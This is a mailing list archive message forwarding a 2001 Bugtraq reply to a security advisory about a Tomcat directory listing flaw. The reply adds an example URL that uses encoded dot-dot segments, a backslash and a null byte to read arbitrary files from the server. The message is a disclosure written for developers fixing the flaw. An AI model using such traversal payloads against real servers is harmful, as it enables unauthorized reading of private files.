tomcat-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Jon Stevens <...@latchkey.com>
Subject FW: CHINANSL Security Advisory(CSA-200108)
Date Mon, 02 Apr 2001 18:04:23 GMT

----------
From: Stian Myhre <niggah@ONLINE.NO>
Reply-To: Stian Myhre <niggah@ONLINE.NO>
Date: Mon, 2 Apr 2001 11:54:52 +0200
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Re: CHINANSL Security Advisory(CSA-200108)

Hi all.

It is possible not only to get the listing
but also the files.
If you use replace the last / with %5c it will
give you the file.

example:
> http://target:8080/%2e%2e/%2e%2e%5cyourfilehere%00.jsp

-Njack


Mime
View raw message